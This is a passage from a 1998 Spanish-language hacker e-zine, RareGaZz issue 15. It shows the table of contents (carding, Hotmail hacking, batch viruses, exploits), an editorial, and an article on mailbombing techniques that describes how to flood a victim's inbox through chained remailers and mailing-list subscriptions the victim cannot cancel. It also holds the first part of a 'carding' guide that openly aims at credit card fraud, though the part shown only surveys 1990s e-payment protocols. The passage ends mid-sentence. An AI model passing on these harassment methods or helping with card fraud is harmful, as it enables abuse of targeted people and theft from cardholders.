----------------------------------------------------
 A�o 2/Numero 15                    �                   Noviembre de 1998
�������������������������������������������������������������������������������
				    �       
	   ----------------------------------------------------

   ooooooo       oo  ooooooo  oooooo     ooooo        oo   oooooo  oooooo
   $$""$$"    o$"$$  $$""$$"  $$       o$$""o,     o$"$$   """$$   """$$
   $$o$$"    $$  $$  $$o$$"   $$$$$$   $$    $$   $$  $$     $$      $$
   $$$$$    $$   $$  $$$$$    $$""""   "$o   $$  $$   $$    $$"     $$"
   $$" $$   $$$$$$$  $$" $$   $$        "$o  $$  $$$$$$$   o$"     o$"
   $$  "$$  $$   $$  $$  "$$  $$ooooo     "$o$$  $$   $$  o$$oooo o$$oooo
   ""   """ ""   ""  ""   """ """""""        ""  ""   ""  """"""" """""""

	   ----------------------------------------------------
				    �
�������������������������������������������������������������������������������
                        "La verdad nos hara libres"
	   ----------------------------------------------------

        
                            Editor: GuyBrush
                       Co-editores: Azumlord, Cytorax, Senpai, PaTa,
                                    Yo_Soy y 12r
                    RareGaZz Team : 12r, Arkangel, AzumLord, Cytorax  
                                    Grovvy,  Guybrush, KillerBot 
                                    Mr.X, Orion, PaTa, RareTrip,
                                    Senpai, ServerHacker, Vov_77
                                    y Yo_soy.
                   Agradecimientos: Dr_Format^, Unamed Person, SatMex,
                                    \Wend|g0, ToMaCHeLi, ZeD, CHack,
                                    Mr. Aztech," >< TONE " y John
          Distribuidores Oficiales: raregazz.acapulco.uagro.mx
                                    raregazz.islatortuga.com
		     E-mail Ofical: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
	       Saludos (Oficiales): #RaZa MeXicaNa Team, X-ploit Team,
                                    SET y JJF Hackers.
	   Frase del Dia (Oficial): "ip!, ip!, echame las otras" Azumlord
				    despues de una mala noche.
      Rayadas de Madre (Oficiales): jmasojan, el lamer de mierda que borro
				    los archivos del ftp de la lista de los
				    RareDudeZz y el(los) idiota(s) lamer(s)
				    que avisaron a los de geocities sobre la
				    pagina de SET.
	   Comentarios (Oficiales): Mas vale tarde que nunca :-)


         ���[ C o n t e n i d o s ]�������������������������������Ŀ
       �Ĵ                                                         �
       � �  +Editorial ------------------------> GuyBrush          �
       � �  +Tecnicas de Mailbombing ----------> Senpai/GuyBrush   �
       � �  +Fraude electronico (Carding) -----> PaTa              �
       � �  +Telefonos celulares (Phreacking) -> Azumlord          �
       � �  +Guia para Hackear Hotmail --------> \Wend|g0          �
       � �  +Crackear PWL's con el PLWOSR -----> CHack             �
       � �  +Agentes Inteligentes -------------> 12r               �
       � �  +Varios trucos interesantes -------> SatMex            �
       � �  +Maneras de colarse en el HD (IRC)-> ToMaCHeLi/ZeD     �
       � �  +IRC (guia rapida) ----------------> Yo_Soy            �
       � �  +Cisco Routers --------------------> GuyBrush          �
       � �  +Hack basico ----------------------> Mr. Aztech/       �
       � �                                       " >< TONE "/John  �
       � �  +Guia de instalacion de CPI's -----> Unamed Person     �
       � �  +Virus Batch (2a Parte) -----------> Yo_Soy            �
       � �  +Corba ----------------------------> 12r               �
       � �  +Blue Boxing en Argentina ---------> Dr_Format^        �
       � �  +Entrevista a X-Ploit Team --------> GuyBrush          �
       � �  +Bugs & Exploits ------------------> PaTa              �
       � �  +Historias del IRC (segunda parte)-> GuyBrush          �
       � �  +Noticias -------------------------> GuyBrush          �
       � �  +Cartas del Lector ----------------> GuyBrush          �
       � �  +Llaves PGP -----------------------> RareGaZz Staff    �
       � �  +Despedida ------------------------> GuyBrush          �
       � �����������������������������������������������������������
       �����������������������������������������������������������

   "Plante un olivito, que espero que crezca sano y saludable a mi lado"
                               << PaTa >>

  01010101010101010101010101010101010101010101010101010101010101010101010
  10                                                                   01
  01 #!/bin/RareGaZzsh                                                 10
  10 # La informacion contenida en este zine tiene fines completamente 01
  01 # de entretenimiento y educativos, los autores de  la informacion 10
  10 # aqui presentada no se hacen responsables de los  posibles da�os 01
  01 # que se puedan ocasionar......                                   10
  10                                                                   01 
  01010101010101010101010101010101010101010101010101010101010101010101010



�[ E d i t o r i a l ]��������������������������������������������������������

  Este ezine es muy especial para mi ya que es el ultimo que edito. Para bien
  o  para mal,  debo dejar  RareGaZz temporalmente.  Resulta que me cambio de
  domicilio y de momento andare unos meses sin telefono, pero no se preocupen
  que seguire sus actividades aunque sea desde un cyberc@fe.

  Azumlord se queda encargado de la direccion de RareGaZz y yo dejare de leer
  mi correo  ya que  estare algo  desconectado de este mundillo durante algun
  tiempo. Pero  quiero que  sepan todos  que, de  una manera u otra, GuyBrush
  estara siempre con ustedes.


                                                -= GuyBrush =-

                                        http://raregazz.acapulco.uagro.mx
                                        http://raregazz.islatortuga.com
                                        
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Tecnicas de MailBombing - Senpai/GuyBrush ]��������������������������������

  Como todos sabeis, el mailbombing es el 'arte' de joderle a alguien el buzon
  de correo. Al igual  que en todo, existen  algunas tecnicas menos lamers que
  otras. Ademas, cualquier persona con dos dedos  de frente y  algunos minimos
  conocimientos debe ser capaz de rechazar este ataque.

  La peor forma de realizar un bombardeo es coger el tipico programa  de mail-
  bombing y enviar 500 mails o ficheros de 20 Mb sin ni  siquiera comprobar si
  el server muestra tu IP ... y luego vienen los problemas.

  Bien, pues  en el  caso de que  alguno sufra un  ataque asi, no  hay mas que
  acceder por telnet al buzon de correo (puerto 110) y borrar todos los mails.
  Como mucho perdemos algun mensaje que nos interese, pero ya esta. Ademas, si
  el  que nos bombardeo  puso el mismo subject  en todos los  mails, mas facil
  todavia para borrarlos.

  Otra tecnica  mejor, seria suscribir a  nuestra victima  a muchas  listas de
  correo. Y si estan en distintos idiomas mejor.

  Pero esto tambien  puede solucionarse  rapidamente. Basta  con leer bien los
  mails y enviar el 'unsuscribe' correspondiente. Ademas, la mayoria de listas
  de correo  piden  una confirmacion  antes de  suscribir a  nadie. Pero  esto
  tambien lo puede preveer el atacante y falsificarlo, al igual que el mail de
  suscripcion.

  Pensando en  algo mas sofisticado,  podriamos crear  una cuenta en hotmail y
  usar un remailer que nos redireccione alli el correo (por ejemplo, en  iname
  o en bigfoot). Una  vez suscritos a las listas y enviadas las confirmaciones
  correspondientes,  ya podemos  modificar  el  'forward'  del  remailer  para
  enviarlo a un nuevo destinatario ... imaginais quien? si, la pobre victima.

  Claro esta  que si  el usuario atacado es un poco 'cuco' puede ver el origen
  de esos mails (vienen del ramailer) y falsificar el 'unsuscribe'.

  Pero, que ocurriria si en vez de un  remailer usamos dos?  podemos suscribir
  el primero y redireccionar los mails al segundo; y de alli a la victima.  De
  esta forma  seria imposible que se dessuscribiera ya que nunca sabra cual es
  la direccion que realmente esta suscrita.

  Bueno, pues eso es todo. Si se os ocurre alguna tecnia mejor ... enviarla.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


�[ Fraude electronico (Carding) - PaTa ]��������������������������������������

����������������������������������������������������������������������������ͻ
���������������������������������������������������������������������������ͻ�
��������������������������������������������������������������������������ͻ��
���         FRAUDE ELECTRONICO   > CARDING <   LA GUIA DEFINITIVA          ���
���                               por PaTa                                 ���
��������������������������������������������������������������������������ͼ��
���������������������������������������������������������������������������ͼ�
����������������������������������������������������������������������������ͼ

        CONTENIDOS

        1� PARTE

        1 ................ Descripcion
        2 ................ Introduccion
        2.1 .............. Tipos de pago
        2.2 .............. Cifrado de datos
        3 ................ Tipos de protocolos
        3.1 .............. Cheques Electronicos FSTC
        3.2 .............. First Virtual
        3.3 .............. CyberCash C-5
        3.4............... DigiCash
        3.5 .............. Virtu@l Cash
        3.6 .............. SSL
        3.7 .............. Despedida

        2� PARTE

       3 ................. Introduccion
       4 ................. Obtener tarjetas de credito
       4.1 ............... Robar tarjetas 
       4.2 ............... Robar tarjetas sin violencia
       5 ................. Trashing
       6 ................. Verificar la tarjeta
       7 ................. Ingenieria social
       8 ................. Recojer el paquete
       9 ................. Estructura de la tarjeta de credito
       10 ................ Crear tarjetas 
       10.1 .............. Algoritmo para la creacion de tarjetas de credito 
       11 ................ Compra por telefono
       12 ................ Varios                
       13 ................ Conclusiones
       14 ................ Agradecimientos


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<


        1.- DESCRIPCION
                         
        Bueno este  articulo  que vas a leer ahora es el resultado  de un duro
trabajo y el seguimiento de algunas lista  de correo sobre el tema, al inscri-
birme  me interesaba la idea pero segun iban  pasando los dias me intereso mas
y  mas, por  lo  que decidi profundizar en el tema, la primera parte que vas a
leer  te  puede resulta  un   poco  aburrida,  pero  nunca  te has preguntado,
�Como se realizan  las  compras  por  Internet?  Yo si, y me dispuse  a buscar
informacion, bueno  y  aqui  esta.  Es una informacion tecnica y puede que  en
algunos casos se te haga pesada, pero esta enfocada desde el punto de vista de
la seguridad obviando otros temas necesarios en las comunicaciones que no  nos
interesan. En la segunda parte podras encontrar informacion para hacer carding
pero para  saber  correr antes hay que saber andar.

        La segunda parte la podras leer en el siguiente numero de la revista.                

                         
        2.- INTRODUCCION
                         

        El salto  del  milenio  apunta  hacia  nuevos  habitos  de consumo. El
consumidor  del  siglo XXI buscar� la comodidad en sus compras.  Los  estudios
sobre  el  comercio  electronico e-commerce, vaticinan, segun  la  prestigiosa
Forrester Research (www.forrester.com) crezca de los 121 millones  de  dolares
de  1997  a  los  3800 en el 2002, solo en EE.UU. �Entonces porque no intentar
sacar algo de provecho nosotros ciudadanos de a pie?

        El  contra-reeenbolso,  es  un  medio perfecto para el usuario, aunque
claro hemos  evolucionado  desde  el  rudimentario  trueque,  hasta la moderna 
pl�stico  ( pasando por los metales preciosos y el papel moneda),...., contra-
reenbolso,...  para  finalmente llegar al comercio electronico, en  todos  los
sitemas  ha  habido  formas de enga�ar y sacar partido , quien ha dicho que en
este ultimo no?

      Como es bien conocido, los medios de pago tradicionales sufren numerosos
problemas  de  seguridad:  falsificaci�n de billetes, falsificaci�n de firmas,
cheques sin fondo, etc. Por otro lado, los medios de pago electr�nicos, adem�s
de  estar  sujetos  a  los  mismos  problemas  anteriores,  presentan  riesgos
adicionales, pues a diferencia  del papel, los documentos digitales pueden ser
copiados perfectamente y cuantas  veces  se desee, las firmas digitales pueden
ser falsificadas por cualquiera que conozca la  clave privada del firmante, la
identidad de una persona puede ser asociada de forma  inequ�voca con la infor-
maci�n relacionada en cada pago, etc.

       Las tarjetas de credito son el instrumento mas utilizado en el comercio
electronico.  Supone  un cobro rapido para el vendedor a cambio de una peque�a
comision. Ademas de que todo el mundo  tiene  una,  se  estan  convirtiendo en
parte importante de nuestra vida, no salimos sin ellas.

        Me voy a centrar en que  el  pago  se  ordena  a  traves  de Internet,
mientras  que la validacion y realizacion efectiva, se realiza a traves de los
circuitos  normales   que  las   entidades  poseen  a  tal  efecto,  de  forma
independiente de si la transacion ha sido ordenada desde Intenet o no.

        Aqui pongo los sistemas que mas se utilizan en Internet. Me dejo cosas
como  el  SET  pero  eso  sera para otro articulo ya que me parece un tema muy
interesante


        2.1 TIPOS DE PAGO

        Los dos sistemas clasicos por excelencia de pago no efectivo  son los
cheques  convencionales  y las tarjetas de credito.  En el sistema financiero,
el dinero toma forma de entrada  en  los  libros  de  los  bancos  y  de otras 
instituciones  financieras.   Esto para el usuario se refleja en la existencia
de una cuenta deposito en la que  se  graban  los  depositos  del cliente y se
realizan pagos en forma de cheques o transferencias.

        Un  cheque  es  un  documento   escrito  por  el  usuario de la cuenta
y  autentificado  por el mismo que se entrega a un comerciante, quien a su vez
lo acepta antes de  presentarlo  en su  banco.   Si el banco cobrador y el del 
vendedor son los mismos, todo se reduce a una compensacion interna de apuntes.  
Si  por le contrario, ambos disponen de cuentas en bancos  distintos, el banco 
cobrador debera presentar  el  cheque  y  recojer  los  fondos  a traves de un
sistema  de  ajuste  o  camara de compensacion ACH (Automatic Clearing House).
Esta  camara  puede  pertenecer al estado,  por ejemplo, al banco emisor de la
moneda, o tratarse de  un  sistema  intermediario  privado,  como  VisaNet ACH
Service.  En el momento  de la entrega del cheque, el cobrador no sabe si este
se  encuentra respaldado por fondos por lo que corre  cierto riesgo.  Pero los
pagadores  tambien  asumen determinados riesgos frente a la posible existencia
de cheques falsos ya que reciben los extractos de las cuentas despues de pagar
sin confirmacion previa al pago.

        Otra alternativa es la  utilizacion de un sistema de credito, como una 
tarjeta  o  un servicio bancario de adelantos de descubiertos.  EL comerciante 
se asegura el pago  y el emisor asume la responsabilidad del cobro.  El ajuste
se realiza entonces cuando el comerciante envia un lote de autorizaciones a su 
banco  entre este y el banco emisor de la tarjeta

        Existen dos tipos de  operaciones  con  tarjeta de credito que suponen 
distinto balance de riesgo en funcion de si la tarjeta se encuentra presente o 
no.
                En  el  primer  caso,  la tarjeta presente, todo el riesgo del 
credito pasa al comerciante.  En estos casos el comerciante puede verificar la 
firma del titular comparando la que este  imprime  en  el  recibo  con  la que 
aparece  en  la  tarjeta.  Por ello, sera  responsabilidad suya si se hace uso 
fraudulento  de la tarjeta de un tercero. La integridad de la transacion queda 
garantizada para  el cliente mediante un papel-copia del recibo.  El nombre de
la cuenta se autentifica  a  traves  del  numero de la tarjeta y la transacion
puede  ser  confirmada  enviando  los datos por medio de una red privada de la
asociacion.

               En el segundo caso, la tarjeta no presente, el consumidor asume 
cierta   parte (peque�a)  del  riesgo  ante   un  posible  fraude  ya  que  es 
responsabilidad  suya  proteger  el numero de tarjeta, debido a que este es el 
unico medio de identificacion del  pagador  en  la  transacion ( como mucho se
podra  pedir  la  fecha  de caducidad y direccion y comprobarlas).  Este es el
sistema  empleado  en los pedidos  por  telefono  o  internet (en pedidos como
correo o fax, aun se  cuenta  con  la  firma  del  titular  como  medio  de no
repudiacion,  que  no de autentificacion). Por  ello, dado que nada impide que
se pueda colocar un sniffer (programa que monotoriza todos los datos que pasan
por  cierto  ordenador)  en  la  red,  los numeros  de  tarjeta  deben  viajar 
encriptados por la red.

        Hay  diferencia  entre  el  uso  de  cheques  y  de tarjetas.  Un pago
mediante  cheques  supone  dinero pagado para el consumidor, que asumira todos
los inconvenientes derivados de una falla del comerciante.  SIn embargo, si se
paga  con tarjeta se puede pedir la restitucion del importe.  EL problema pasa
a ser del banco   emisor  de  la  tarjeta,  que  debera  pedir  cuentas al del
comerciante.
                
      Considerando que el cyber-espacio no pueden ser iguales las transaciones 
que de la forma clasica se deben tener en cuenta:

        - Seguridad:  La criptograf�a moderna proporciona complejos mecanismos
matem�ticos que   evitan  el  fraude.  Por otro  lado, la seguridad es un tema
complejo que involucra   muchos   otros   factores:   protocolos,  est�ndares,
autoridades  de certificaci�n, etc.
        - Verificacion  de  la  autorizacion  de las transaciones, para evitar
fraudes. En el modelo clasico esta verificacion  se  hace  mediante  firmas en 
tarjetas  de  credito  o  en  cheques,  en el mundo electronico se suelen usar
aunque no siempre las firmas digitales.
        - Confidencialidad : Ciertos    datos   intercambiados   durante   una
transacci�n de pago necesitan ser ocultados  a la vista de todo el mundo salvo
para el agente al que van destinados dichos datos.
La  confidencialidad  es normalmente garantizada mediante el cifrado de datos.
Sin embargo, �sta cuesti�n  est�  resultando  ser un problema en la mayor�a de
los  pa�ses  debido a las restricciones impuestas por los diferentes gobiernos
para utilizar algoritmos  criptogr�ficos de cifrado de datos con un alto nivel
de seguridad. En algunos pa�ses ( Francia)  el cifrado de datos est� absoluta-
mente prohibido sin el permiso de la oficina  gubernamental  correspondiente y
normalmente  sin el dep�sito previo de las claves de cifrado en dicha oficina.
En otros pa�ses (EE.UU.) se  restringe  la  utilizaci�n de estos algoritmos al
territorio nacional, debiendo utilizar una versi�n mermada del algoritmo si se
quiere utilizar m�s all� de sus fronteras.
       - Garantia de la integridad de las ordenes, con el fin de evitar abusos
por  parte de los comerciantes.  En el sistema  habitual  se  emplean  papeles 
especiales, en  el  mundo  electronico  se  emplearan  certificados digitales, 
descripciones   encriptadas  del   intermnediario,  y  se  utilizaran  recibos 
digitales.
        - Confidencialidad: No solo  proteger los numeros y campos claves sino  
la  privacidad del usuario, ocultando incluso a los ojos de los intermediarios.
        - Integridad: Otro aspecto importante en todo sistema de pago electr�-
nico  es  la  integridad  de  los  datos  intercambiados entre los agentes del
sistema,  m�xime  cuando  esos  datos  se refieren a importes de un pago, a un
n�mero  de  cuenta  bancaria, etc. La  integridad  de  las  comunicaciones  es
garantizada mediante  c�digos  de  autenticaci�n de mensajes (MACs), funciones
resumen y firmas digitales. En el caso de la relaci�n cliente - comercio, esto
s�lo  es  posible  cuando  el  cliente  est� en posesi�n de un dispositivo con
capacidad de c�lculo y de almacenamiento  seguro de claves, como es el caso de
una tarjeta inteligente.
     As� por ejemplo, las claves criptogr�ficas de clientes y comercios suelen
almacenarse  en  tarjetas inteligentes y m�dulos de seguridad (SAMs) respecti-
vamente. Los datos en los servidores  de  las entidades financieras que inter-
vienen en el sistema de pago de son almacenados  en  b�nkers  de seguridad que
normalmente  se  encuentran  duplicados  para  evitar las posibles p�rdidas de
informaci�n como consecuencia de posibles fallos.
        - Ajuste de cuentas: Se recurria a las redes financieras clasicas.
        - Autentificacion:  En  todo sistema de pago los participantes del
sistema deben demostrar que son los que dicen ser.  Para evitar los fraudes.
        En  el caso de tarjetas inteligentes (con microprocesador, dotadas por
tanto de una  capacidad  de  c�lculo) esto se realiza mediante alg�n protocolo
criptogr�fico de autenticaci�n, mientras  que en el caso de tarjetas con banda
magn�tica, se  realiza  mediante  una  verificaci�n  visual  de  ciertos datos
grabados en la superficie de la tarjeta (hologramas, firmas, etc.).
        En los  sistemas  basados  en  tarjetas, se suele verificar tambi�n la
asociaci�n  correcta  de  la  tarjeta  con  su  poseedor (Titular de la cuenta
asociada  a  la  tarjeta). Esto  se realiza normalmente a trav�s de n�meros de
identificaci�n  personal (PIN). Lo  mismo  ocurre  en  los  sistemas de pago a
trav�s de  redes  donde se necesita una autenticaci�n de la persona f�sica que
utiliza en un instante determinado el sistema.
        - Confirmacion de  la  transacion.  Para  evitar  que  nadie  suplante
nuestra personalidad.
        - Anonimato: Si una persona realiza un viaje en un medio de locomocion
no  privado,  y  paga  en  efectivo  no hay forma de monotorizarle, pero si en
cambio  paga con una tarjeta de credito, (quien quiera ver un ejemplo practico
que se lea "El Informe Pelicano").  Pero si  lo  paga  con  trajeta de credito
puede  ser  posible recontruir su recorrido, e incluso los sitios por donde ha
pasado y pagado  con  su tarjeta.  Esto mismo ocurre con todo tipo de compras.
No  obstante, el anonimato  constituye  sin  duda  uno  de  los  aspectos  m�s
pol�micos  de  estos  sistemas,  ya que mientras para unos ser�a base irrenun-
ciable de la libertad econ�mica y el derecho a la intimidad, para otros podr�a
constituir una puerta abierta a la delincuencia y el blanqueo de dinero.
        - Independencia: El uso de dinero digital no deber�a estar restringido
a una red, organizaci�n o pa�s concreto, sino que deber�a ser independiente de
esas limitaciones y f�cilmente utilizable desde cualquier punto del planeta.
     Aqui una peque�a descripcion de los medios de pago, no voy a entretenerme
mucho con ellos ya que se podria hablar bastante:


        2.2 CIFRADO DE DATOS

        Tenemos  que  tener  en cuenta  que  nuestro dinero viaja por la red y
cualquiera puede tener acceso a ello, por lo  que  sera  basico  que  nuestras
transacciones  vayan  encriptadas.  Internet  en un medio basicamente inseguro
por lo que las medidas de seguridad deben ser altas.
        La mayor  parte  de  protocolos  que  utilizan los siguientes sistemas
utilizan  algoritmos  criptogr�ficos  de clave p�blica (RSA), de clave secreta
(DES), o ambos a la vez, para cifrar todos los datos importantes, de forma que
s�lo puedan ser accesibles a las partes involucradas  en  las  operaciones,  y
todos ellos tienen buen cuidado en que su empleo sea absolutamenarente para el
usuario.
        Aunque  puedas  pensar  que el cifrado sea absolutamente necesario, no
utilizaba ninguna clase de cifrado, se basaba en el uso del correo electronico
El sistema de pagos de First Virtual ha  sido  retirado  recientemente de este
mercado, pese a habersido uno de sus pioneros.

        
      3 TIPOS DE PROTOCOLOS

      3.1 CHEQUES ELECTRONICOS FSTC (Financial Services Technology Consortium)

        El  pagador  debe  contar  contar  con  un  procesador  seguro, que se
implementa en forma de tarjeta inteligente.
        Este procesador es el encargado de generar los cheques  que consisten, 
simplemente en ordenes de pago firmadas digitalmente. Los cheques se trasmiten
al comerciante que tambien los acepta firmandolos, tambien digitalmente  y los
envia al banco, que los hara efectivos a traves de la una red ACH clasica.

 ��������������������������������������������������������������������������Ŀ
 �                 Esquema de funcionamiento de cheques FSTC                �
 �               ��������������������������������������������               �
 �                                                                          �
 �                                                                          �
 �                                                                          �
 � Pagador �-�> Cueque                                                      �
 �              Firma Pagador                                               �
 �              Certificado Kpp ��-->  Cobrador  �-->  Cheque               �
 �                                                     Firma pagador        �
 �                                                     Certificad Kpp       �
 �                                                     Firma Cobrador       �
 �                                                     Certificado Kpc      �
 �                                                          �               �
 �                                                          �               �
 �         Banco Cobrador <-� ACH �--> Banco pagador  <-�����               �
 �                                                                          �
 ����������������������������������������������������������������������������


        3.2  FIRST VIRTUAL (FV) 

        Fue uno de los primeros en aparecer con al pecularidad de no hacer uso
de la criptografia.  Un  consumidor  que  desee  hacer uso del sistema primero
debe  registrarse  en  el  mismo, tras  lo  que  obtiene  un Virtual PIN, ID o
identificador de First Virtual.  Para ello debe de enviar un numero de tarjeta
de  credito, VISA o MasterCard, por  medio off-line, como telefono o fax.  Una
vez  registrado, quiera  hacer  una  compra  a  un  comerciante  o  acceder  a
informacion restringida en un servidor que emplee el sistema

 ��������������������������������������������������������������������������Ŀ
 �                    Esquema del sistema First Virtual                     �
 �             ��������������������������������������������                 �
 �                                                                          �
 � PAGADOR            Virtual Pin (1) ��������--> PAGADO  <-���������Ŀ     �
 �   / \   <-�������� (4) informacion               / \               �     �
 �    �                                              �                �     �
 �    �                                              �                �     �
 �    |                                              �                �     �
 �  Quieres                                          |                |     �
 �   pagar?                                    Solicitud (2)     Respuesta  �   
 �   (5)  �-->�����-<-�-  FIRST -->�����--���-<--Autorizacion      (3)      �
 � Respuesta             VIRTUAL ->�����--���-<-���������������������       �
 �                           |                                              �
 �                           �                                              �
 �                           � (7)                                          �
 �                          \ /                                             �
 �   BANCO PAGADOR <�����-- ACH �������-->BANCO COBRADOR                    �
 �                                                                          �
 ����������������������������������������������������������������������������


        Para obtenerlo recibiremos un mail con una clave de doce digitos, y un
numero de telefono donde confirmarlo.  Mantener un PIN cuesta 5 dolares al a�o
aproximadamente.  Como vemos los datos se envian por un medio off-line.

        Le  bastara  presentar  su  Virtual  PIN  al  mismo. El comerciante se
conectara a un servidor FV para comprobar si es correcto, y de ser asi, enviara
la mercancia o dara paso libre a la informacion.
Para  realizar  un  pago  al  comerciante,  First  Virtual, envia un e-mail la 
consumidor  en el que le indica la operacion y le pregunta si desea paga o no.  
El  consumidor  puede  responder "yes", "no", "fraud". Mediante  este  sistema
el comerciante no llega nunca a saber el numero de tarjeta del consumidor,  ni
llega nunca a viajar por la red.

        El protocolo de validacion de FV es el mas lento de todos los medio de
pagos electronicos, no hace uso de la criptografia lo  que  da  al usuario una
falsa sensacion de seguridad , si se dota de anonimicidad al usuario frente al 
comerciante.


        3.3 CYBERCASH: C-5

        Es uno  de  los  medios de pago electronicos pioneros.  La empresa fue
creada en 1994 y el sistema  CyberCash  se  encuentra operativo desde abril de
1995.   Se trata de un sistema integrado con el WWW que  utiliza  un protocolo
propio manejado  por un software que debe ser distribuido tanto a comerciantes
como a consumidores. Constituye  una  pasarela  entre Internert y las redes de 
autorizacion  de emisores de tarjetas, contando  para ello  con la experiencia 
ganada  con el sistema Verifone, de autorizacion de tarjetas por telefono, del 
cual deriva.   El  consumidor  cuenta con un software "wallet", o monedero que 
puede  ligar  a  varias  cuentas  bancarias  o  a  las tarjetas de credito. El
sotfware  encripta todos los datos, realiza  un  registro de todas las transa-
ciones y se encuentra  protegido  mediante  contrase�a.  En el lado del comer-
ciante se situa un software similar.
      Cuando un usuario baja el softwre  de CyberCash, genera un par de claves 
publica, Kp, y privada, Ks para el.  El  sistema empleado es RSA de 1024 bits.  
A continuacion envia Kp al servidor de CyberCash  que  almacena en una base de 
datos. De  esta forma solo CyberCash sabe las claves  publicas  de  todos  los 
interlocutores  posibles.  La  comunicacion  entre consumidor y comerciante se 
lleva a cabo  en claro, mientras que la comunicacion de estos con CyberCash se 
realiza de forma protegida.  Para ello  se  emplea  una  clave   de sesion DES 
aleatoria de  56  bits  que  se ditribuye  encriptada con la llave publica del 
interlocutor.  CyberCash  tiene  incrustada  su  propia   llave  publica en el 
software por lo que cualquiera puede comunicarse con el. Un dato importante es
que  al  clave  DES es de 56 bits cuando  por  las  leyes  de  la  legislacion 
americana antes fijaban  un  maximo de 40 bits, y es que CyberCash consigio un 
permiso especial.

        La transacion se lleva a cabo de la siguiente manera:

                1.- El cliente  seleccicona un item a adquirir  mediante www y
elabora un pedido.
                2.-El software del comerciante envia "la facturas proforma" al 
software " wallet".  La   factura   proforma   es   texto  en  claro,  firmado
digitalmente  en  el  que  figura  una  descripcion  de la compra asi como las
tarjetas  de  credito  aceptadas.  Para  la realizacion de firmas digitales se
emplean funcines hash MD5 y claves secretas RSA.  A  su  recepcion, el sofware
"wallet" da  a elegir al usuario entre aquellas tarjetas que tiene registradas
y le pide autorizacion para realizar el pago.
                3.- Previa  confirmacion del usuario, el software "wallet" del 
cliente  genera  un  mensaje  de pago y lo envia la comerciante.  Este mensaje 
consiste en un hashing de la factura  junto  con  las  instruccuiones de pago,
todo  ello firmado digitalmente y encriptado para CyberCash.
                4.- A la  recepcion  del memsaje, el comerciante, que no puede 
descrifarlo simplemente  a�ade  la  informacion  al  pedido  (tambien  firmada
digitalmente) y lo remite a CyberCash.
                5- CyberCash  desencripta  y  compara  los  dos  mensajes.  Si 
coinciden  los datos, solicita confirmacion, y a traves de la red financiera y 
trasmite la  respuesta al comerciante para que este pueda cerra la transaccion
con el cliente.

       Todo este proceso se lleva a cabo en un periodo de tiempo inferior a un
minuto. El proceso descrito es el caso mas habitual, no obstante, el protocolo 
CyberCash es mucho  mas  complejo  y  contempla  la posibilidad de reintregos, 
anulaciones y solicitud de estado.  Una version antigua  se puede encontrar en 
Internet en forma RFC.

        Respecto  a  la  proteccion  del  consumidor  cabe  destacar   que, al
encriptarse  la  orden de pago para CyberCash y no para el comerciante este no
ve el numero de la tarjeta  de credito  lo  que  unido  al  hecho  de  que  se
comprueba  la  descripcion  de  la  compra, impide  el  abuso por parte de los
comerciantes.  En  lo referente a la privacidad, aunque CyberCash tiene acceso
a la descripcoin de la compra, esta no tiene porque incluir los detalles de la
compra, puede  constar  como  dato la referencia  y el tipo solamente. De este
modo el comerciante no ve al tarjeta  y  CyberCash  no  ve  el  producto.  Sin
embargo este  sistema  es  susceptible a ataques de trafico, es decir del tipo
"detecto que Fedez se conecta mucho al servidor de Playboy"     (Saluda Fedez,
que ya eres famosos en Inet) :o)

 ��������������������������������������������������������������������������Ŀ
 �                Esquema de funcionamiento Cybercash                       �
 �             ��������������������������������������������                 �
 �                                                             ������Ŀ     �
 � �������Ŀ               Solicitud (1) --------------------> �      �     �
 � �       � <------------ (2) Factura proforma                �PAGADO�     �
 � �PAGADOR�               Datos pedidos tarjeta (3)---------> �      �     �
 � �       � <------------ (5) Respuestas                      ��������     �
 � ���������                                                    / \ �       �
 �                                    ����������������������������  �       �
 �                                    �                             �       �
 �                                   Respuesta (5)                  �       �
 �                                    �                             �       �
 �                                    �            Solicitud        �       �
 �                              ���������Ŀ<-���- autorizacion�������       �
 �                              �CYBERCASH�          (4)                    �
 �==============================�         �=================================�
 �                              � GATEWAY �                                 �
 �                              �����������                                 �
 �                                  �                                       �
 �                                  | Respuesta (5)                         �
 �                                 \ /                                      �
 �           BANCO PAGADOR <-�����-ACH����������-->BANCO COBRADOR           �
 �                                                                          �
 ����������������������������������������������������������������������������


        3.4 DIGICASH

       Otro  sistema  es  Digicash, la diferencia con CyberCash, radica en que
es un sistema de pago anticipado,  donde se adquiere previamente el dinero del
banco y se almacena digitalmente en el software  del  comprador.  Este sistema
permite la compra anonima ya que no requiere autentificacion
        

        3.5 VIRTU@L CASH

      Tambien existe Virtu@l cash, de Banesto, para poder usarla hay que tener
una cuenta en Banesto.  Trabaja en un servidor seguro, certificado por la RSA.

     La tarjeta Virtu@lCash es una tarjeta de debito, de manera que el importe
de la compra se adeuda en la cuenta  asociada en  el  momento de realizarse la
operacion. La  Tarjeta podra ser utilizada, exclusivamente  a  traves  de  los
comercios adheridos a este  sistema  de  pago, limitandose los importes de las
compras al saldo disponible en la cuenta asociada a la tarjeta y a un maximo
diario preestablecido.

        Repecto a la seguridad.  El sistema se basa en el servicio de Comercio
electronico de Banesto apoyado en una  infraestructura  de  seguridad, dispone
de un servidor seguro y ha obtenido el certificado electronico RSA que permite
que las comunicaciones se realicen de forma cifrada. 
       
        Asimismo, para  poder  asociarse a este servicio se  exige a todos sus
socios,  que  lleven  a  cabo  proyectos de comercio electronico, el empleo de
